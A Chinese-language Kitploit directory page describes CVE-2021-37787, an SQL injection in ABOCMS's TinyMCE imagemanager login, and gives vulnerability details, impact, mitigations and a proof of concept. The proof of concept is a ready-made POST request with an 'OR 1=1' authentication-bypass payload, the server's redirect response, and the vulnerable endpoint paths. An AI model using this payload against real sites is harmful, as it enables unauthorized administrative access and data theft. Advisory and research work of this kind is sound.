Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-37787 — CVE-2021-37787 | Kitploit
工具/GitHubGitHub/vasykor/cve-2021-37787
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubvasykor/cve-2021-37787

CVE-2021-37787

CVE-2021-37787

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-37787: 通过TinyMCE模块实现ABOCMS中的SQL注入

漏洞详情

  • CVE ID: CVE-2021-37787
  • 产品: ABOCMS
  • 受影响版本: 5.8.x, ≤5.9.3
  • 漏洞类型: SQL注入
  • CVSS评分: 9.8

描述

ABOCMS的TinyMCE模块中存在一个严重的SQL注入漏洞。该漏洞是由于TinyMCE模块与数据库交互时输入清理不足导致的,允许攻击者注入恶意的SQL查询。这可能导致未经授权的数据访问、修改,甚至完全入侵底层数据库。

脆弱端点位于TinyMCE模块处理用户输入的过程中。攻击者可以利用此缺陷执行任意SQL命令。

影响

  • Aunthentication绕过。
  • 敏感数据提取。
  • 数据库记录的修改或删除。
  • 潜在远程代码执行,具体取决于数据库配置。

概念验证(PoC)

POST请求

root@kitploit:~
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded

return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

响应

root@kitploit:~
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

脆弱端点

该漏洞可通过以下端点触发:

/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php

缓解措施

  • 对于用户:

    • 升级到ABOCMS的最新版本。
    • 如果TinyMCE模块不是必需的,请禁用它。
  • 对于开发者:

    • 使用预处理语句或参数化查询与数据库交互。
    • 将TinyMCE模块更新到最新的安全版本。
    • 实施正确的输入验证以过滤恶意载荷。

免责声明

此PoC仅用于教育和安全研究目的。未经所有者明确许可,请勿使用此代码对系统或网络造成损害。作者不对因使用此PoC导致的任何误用或损坏负责。

下载工具